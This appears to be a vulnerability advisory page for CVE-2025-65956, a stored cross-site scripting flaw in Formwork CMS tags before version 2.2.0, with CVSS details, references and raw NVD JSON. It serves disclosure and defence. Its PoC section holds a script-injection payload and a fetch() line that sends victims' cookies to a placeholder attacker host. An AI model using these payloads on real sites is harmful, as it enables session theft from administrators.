Security Vulnerability Report
CVE-2025-65956 CVSS 6.5 MEDIUM

Published: 2025-11-26 00:15:51
Last Modified: 2025-12-03 20:30:02

Description

Formwork is a flat file-based Content Management System (CMS). Prior to version 2.2.0, inserting unsanitized data into the blog tag field results in stored cross‑site scripting (XSS). Any user with credentials to the Formwork CMS who accesses or edits an affected blog post will have attacker‑controlled script executed in their browser. The issue is persistent and impacts privileged administrative workflows. This issue has been patched in version 2.2.0.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:formwork_project:formwork:*:*:*:*:*:*:*:* - VULNERABLE
Formwork CMS < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-65956 PoC - Formwork CMS Stored XSS in Blog Tags
// Prerequisites: Valid Formwork CMS user credentials

// Step 1: Create a blog post with malicious tag
const payload = '<script>console.log(document.cookie)</script>';

// Example HTTP request to create blog post with XSS payload in tag field
const createPostRequest = {
  method: 'POST',
  url: 'https://target-site.com/formwork/api/posts',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <session-token>'
  },
  body: JSON.stringify({
    title: 'Test Blog Post',
    tags: [payload],
    content: 'This is test content'
  })
};

// Step 2: When admin views the post, XSS executes
// The script will exfiltrate cookies to attacker-controlled server
const exfilScript = `<script> fetch('https://attacker.com/steal?c=' + btoa(document.cookie)); </script>`;

// Attack flow:
// 1. Attacker with valid credentials creates/edits blog post
// 2. Inserts XSS payload in tags field
// 3. Payload is stored without sanitization
// 4. Any user viewing/editing the post triggers the XSS
// 5. Attacker steals session cookies or performs actions as victim

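References

https://github.com/getformwork/formwork/commit/4abcd60ae7692b46d316f956b0b20fb85336f3b2 (Patch)
https://github.com/getformwork/formwork/pull/791 (Issue Tracking, Patch)
https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj (Exploit, Third Party Advisory)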

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65956", "sourceIdentifier": "[email protected]", "published": "2025-11-26T00:15:50.770", "lastModified": "2025-12-03T20:30:01.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Formwork is a flat file-based Content Management System (CMS). Prior to version 2.2.0, inserting unsanitized data into the blog tag field results in stored cross‑site scripting (XSS). Any user with credentials to the Formwork CMS who accesses or edits an affected blog post will have attacker‑controlled script executed in their browser. The issue is persistent and impacts privileged administrative workflows. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:formwork_project:formwork:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": 
"623A8C3D-B50D-4064-BD68-9ECD31ECF62F"}]}]}], "references": [{"url": "https://github.com/getformwork/formwork/commit/4abcd60ae7692b46d316f956b0b20fb85336f3b2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/getformwork/formwork/pull/791", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}